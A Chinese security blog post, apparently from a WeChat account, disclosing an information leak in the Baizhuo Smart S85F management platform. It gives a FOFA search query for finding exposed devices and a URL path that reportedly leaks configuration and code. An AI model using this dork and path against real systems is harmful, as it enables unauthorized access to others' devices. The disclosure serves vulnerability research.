声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关。

免责声明: 该教程仅用于网络安全学习，如有人利用该技术从事违法犯罪行为一切和作者无关，请各位遵守法律法规！可以转发，禁止直接复制粘贴！

百卓网络Smart S85F管理平台存在信息泄漏

一、漏洞描述

北京百卓网络技术有限公司（以下简称百卓网络）是一家致力于构建下一代安全互联网的高新技术企业。百卓网络Smart S85F管理平台数据库管理存在信息泄漏。攻击者可利用漏洞获取服务器权限或对系统造成业务影响。

二、漏洞影响

Smart S85F

三、搜索语法

app="Smart管理平台" && body="S85F"

四、漏洞复现

1. 在fofa搜索：app="Smart管理平台"&&body="S85F"
2. 如图登录界面。

3.如图访问https://ip/cmdscripts/php_wj_rule_config泄露网站配置信息以及代码信息

最近公众号在语雀创建了一个公开知识库，欢迎各位大佬关注和投稿

https://www.yuque.com/goutou-ojnlx/cfyc3e/sp8yaau0ggbllmo0

原文始发于微信公众号（狗头网络安全）：1Day---百卓网络Smart S85F存在信息泄露漏洞 CNVD-C-2023-1334285